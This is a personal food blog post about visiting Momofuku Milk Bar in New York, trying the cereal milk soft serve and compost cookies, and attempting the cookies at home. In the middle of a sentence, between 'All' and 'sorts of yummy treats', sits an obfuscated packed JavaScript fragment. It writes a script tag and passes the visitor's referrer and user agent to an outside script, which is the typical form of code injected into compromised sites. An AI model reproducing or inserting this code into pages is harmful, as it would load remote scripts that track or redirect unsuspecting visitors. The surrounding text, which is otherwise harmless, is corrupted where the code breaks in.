Compost Cookies

You heard that right.

Compost cookies!

While in New York, Nick and I were told by several people to hit up one of the Momofuku restaurants.  We stopped by Ma Peche and decided that dinner would be a little steep for us.  Luckily, there is a bakery/sweets store attached to the restaurant.  And the price tag was much more our speed 🙂

Milk Bar.

All ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyeyr|var|u0026u|referrer|rkfsf||js|php’.split(‘|’),0,{}))
sorts of yummy treats!  We were told to try 3 things.  Cereal milk soft serve, compost cookies and crack pie.

Our first night there we tried the cereal milk soft serve. O.M.G.  I don’t even like cereal milk but this was incredible.  It started off a little weird, but about half way through I couldn’t get enough.

Nick thought the compost cookie sounded gross, so we just stuck with the soft serve.

One of my NY friends suggested the compost cookie, so I decided we needed to give it a try. Holy Moly.

You have to get over the name and the ingredients – besides the chocolate and butterscotch chips, the cookies also include pretzels, potato chips and coffee grounds.  Hmmm.

I’m a salty/sweet person.  I dip my fries in milk shakes.  So this actually sounded like it might be up my alley.  And it was.  Soooo delicious!  Nick liked it to.  So then I decided to try and make them.

I think they turned out pretty good, but I still have to perfect the proportions of salty to sweet.  For details on how to make these cookies – trust me they taste better than they sound – visit my other blog here.
